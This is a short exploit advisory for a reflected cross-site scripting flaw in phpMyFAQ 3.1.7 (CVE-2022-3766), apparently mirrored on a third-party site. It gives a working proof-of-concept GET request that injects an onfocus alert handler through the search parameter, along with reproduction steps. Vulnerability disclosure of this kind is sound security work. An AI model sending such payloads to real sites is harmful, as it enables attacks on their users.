# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpmyfaq/ # Software Link: https://github.com/thorsten/phpmyfaq/ # Version: 3.1.7 # Tested on: Windows # CVE : CVE-2022-3766 Proof Of Concept GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29 Additional Conditions: - Ensure that no security mechanisms (like a web application firewall) are blocking the specific request pattern. - The application must be running a phpMyFAQ version prior to 3.1.8. Steps to Reproduce Log in phpmyfaq. Send the request. Observe the result
Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
